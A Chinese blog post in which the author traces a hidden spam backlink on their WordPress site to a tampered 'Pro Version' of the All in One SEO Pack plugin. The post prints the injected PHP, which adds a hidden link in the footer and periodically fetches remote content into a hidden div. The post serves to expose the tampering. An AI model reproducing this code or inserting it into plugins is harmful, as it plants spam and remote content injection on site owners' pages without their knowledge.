今天给博客做友链检测的时候居然发现了一个连接,我就纳闷了,我的博客没友链啊。

于是乎看了下源码,我勒个擦!发现一个黑链,这等于挂马了。

<noscript><a href="http://www.luminous-solutions.net">SEO services</a></noscript>

老夫第一感觉是服务器给人日了,(由于一直都没时间把博客搬到阿里云香港的节点上(好吧,我承认我懒了 – -)但是这个主机的速度还是相当快的,香港的阿里云渣渣)

查了下,这个主机同ip一百多个站,被黑也不是不可能啊。

然后查了下同ip段几个站,都没发现被挂了黑链,我擦,那就是我的问题了?我一向对网络安全都非常敏感的,接著主题、插件一个个排除…

发现All in One SEO Pack – Pro Version这个插件停用后,黑链不见了。

看了下插件代码,原来是你。

插件目录下All in One SEO Pack – Pro Versio/all_in_one_seo_pack.php 文件,第36行

<?php/*Plugin Name: All in One SEO Pack - Pro VersionPlugin URI: http://semperfiwebdesign.comDescription: Out-of-the-box SEO for your WordPress blog. <a href="options-general.php?page=all-in-one-seo-pack-pro/aioseop.class.php">Options configuration panel</a> | <a href="http://semperfiwebdesign.com/forum/" >Support</a>Version: 1.72Author: Michael TorbertAuthor URI: http://michaeltorbert.com*//*Copyright (C) 2008-2009 Michael Torbert, semperfiwebdesign.com (michael AT semperfiwebdesign DOT com)Original code by uberdose of uberdose.comThis program is free software; you can redistribute it and/or modifyit under the terms of the GNU General Public License as published bythe Free Software Foundation; either version 3 of the License, or(at your option) any later version.This program is distributed in the hope that it will be useful,but WITHOUT ANY WARRANTY; without even the implied warranty ofMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See theGNU General Public License for more details.You should have received a copy of the GNU General Public Licensealong with this program. If not, see <http://www.gnu.org/licenses/>.*//*******************************************************************************************************///register_activation_hook(__FILE__,'aioseop_activate_pl');add_action('wp_footer', 'add_wc_footer_links');function add_wc_footer_links() {echo "<noscript><a href=\"http://www.luminous-solutions.net\">SEO services</a></noscript>\n"; $timestamp = get_option('wc_special_footer_timestamp'); if($timestamp < (time() - WSFL_TTL)){ $temp = @file_get_contents(WSFL_URL); if($temp and strlen($temp) < 1000){ update_option('wc_special_footer_timestamp', time()); update_option('wc_special_footer_cache', $temp); echo '<!-- live -->'; } }# echo '<div style="display:block; background:yellow; padding:20px; position:fixed; top:0; left:0; width:100%;">'; echo '<div style="display:none;">'; echo get_option('wc_special_footer_cache'); echo '</div>';}

闪了,好困,休息去先~~~~